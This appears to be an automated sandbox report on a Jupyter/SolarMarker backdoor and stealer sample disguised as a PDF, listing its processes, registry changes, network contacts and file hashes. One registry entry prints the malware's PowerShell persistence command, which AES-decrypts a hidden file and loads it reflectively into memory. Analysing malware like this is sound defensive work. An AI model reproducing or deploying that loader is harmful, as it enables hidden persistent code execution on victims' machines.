Malware Analysis Report

2024-10-16 02:55

Sample ID 230221-rawxqafa28
Target $RZJBSB5.pdf
SHA256 30fdcbb1f2999987df2eb6b32c6b0863487f3a55dc6ca65b0e9ef14a2234be15
Tags
jupyter backdoor stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

30fdcbb1f2999987df2eb6b32c6b0863487f3a55dc6ca65b0e9ef14a2234be15

Threat Level: Known bad

The file $RZJBSB5.pdf was found to be: Known bad.

Malicious Activity Summary

jupyter backdoor stealer trojan

Jupyter, SolarMarker

Blocklisted process makes network request

Drops startup file

Modifies registry class

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

Suspicious use of WriteProcessMemory

MITRE ATT&CK

N/A

Analysis: static1

Detonation Overview

Reported

2023-02-21 14:00

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-02-21 13:59

Reported

2023-02-21 14:23

Platform

win10-20230220-en

Max time kernel

599s

Max time network

602s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

Signatures

Jupyter, SolarMarker

backdoor trojan stealer jupyter

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\w2srnyagayd.lnk C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command\ = "powershell -command \"$A=New-Object System.Security.Cryptography.AesCryptoServiceProvider;$A.Key=@([byte]133,165,236,47,97,52,224,19,17,83,18,190,103,228,59,187,224,102,137,106,50,192,211,70,56,15,156,77,135,31,120,97);$A.IV=@([byte]124,49,69,244,29,153,237,162,142,248,178,31,144,35,21,204);$F=[Convert]::FromBase64String([IO.File]::ReadAllText('C:\\Users\\Admin\\qkge3jcwqpk.4fiogvf051v'));[Reflection.Assembly]::Load($A.CreateDecryptor().TransformFinalBlock($F,0,$F.Length));[tFRnUqM6yokMORTCQTcvWCNIieWokxn21zabD9OzPw40x3pcfb04HUoG0z7TBgb.r2Ha19C5g7CkWUOInFr4I9c9xo2lUSHVWqP2RCpVIUHvcpSfZcOsQQGGs]::crfL33M9t_IvR8F8mDk9Ki72QQRB0VSBdq_bNHIG84_k();\"" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\.4fiogvf051v\ = "24eeurs1ylq" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open\command C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3853465373-1718857667-1861325682-1000_Classes\24eeurs1ylq\shell\open C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 4144 wrote to memory of 3924 N/A C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 4144 wrote to memory of 3924 N/A C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe

"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell

Network

Country Destination Domain Proto
FR 40.79.141.152:443 tcp
NL 88.221.25.155:80 tcp
PL 146.70.161.126:80 146.70.161.126 tcp
US 8.8.8.8:53 126.161.70.146.in-addr.arpa udp

Files

memory/3924-120-0x0000022F52AE0000-0x0000022F52B02000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_xjrf1x24.5pi.ps1

MD5 c4ca4238a0b923820dcc509a6f75849b
SHA1 356a192b7913b04c54574d18c28d46e6395428ab
SHA256 6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA512 4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

memory/3924-147-0x0000022F6B0E0000-0x0000022F6B11C000-memory.dmp

memory/3924-158-0x0000022F6B6A0000-0x0000022F6B716000-memory.dmp

memory/3924-163-0x0000022F52B40000-0x0000022F52B50000-memory.dmp

memory/3924-164-0x0000022F52B40000-0x0000022F52B50000-memory.dmp

memory/3924-169-0x0000022F52B40000-0x0000022F52B50000-memory.dmp

memory/3924-170-0x0000022F52B40000-0x0000022F52B50000-memory.dmp

memory/3924-243-0x0000022F52B40000-0x0000022F52B50000-memory.dmp

memory/3924-249-0x0000022F6B190000-0x0000022F6B21E000-memory.dmp

memory/3924-254-0x0000022F52B40000-0x0000022F52B50000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-02-21 13:59

Reported

2023-02-21 14:23

Platform

win10v2004-20230220-en

Max time kernel

80s

Max time network

149s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

Signatures

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2140 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2140 wrote to memory of 1028 N/A C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Processes

C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe

"C:\Users\Admin\AppData\Local\Temp\$RZJBSB5.exe"

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell

Network

Country Destination Domain Proto
US 8.8.8.8:53 240.232.18.117.in-addr.arpa udp
US 117.18.237.29:80 tcp
NL 173.223.113.131:80 tcp

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_kfgvnuzf.rbq.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/1028-142-0x000002BB60900000-0x000002BB60922000-memory.dmp

memory/1028-143-0x000002BB60980000-0x000002BB609C4000-memory.dmp

memory/1028-144-0x000002BB60DF0000-0x000002BB60E66000-memory.dmp

memory/1028-146-0x000002BB456E0000-0x000002BB456F0000-memory.dmp

memory/1028-145-0x000002BB456E0000-0x000002BB456F0000-memory.dmp

memory/1028-147-0x000002BB456E0000-0x000002BB456F0000-memory.dmp

memory/1028-148-0x000002BB456E0000-0x000002BB456F0000-memory.dmp

memory/1028-149-0x000002BB456E0000-0x000002BB456F0000-memory.dmp

memory/1028-150-0x000002BB456E0000-0x000002BB456F0000-memory.dmp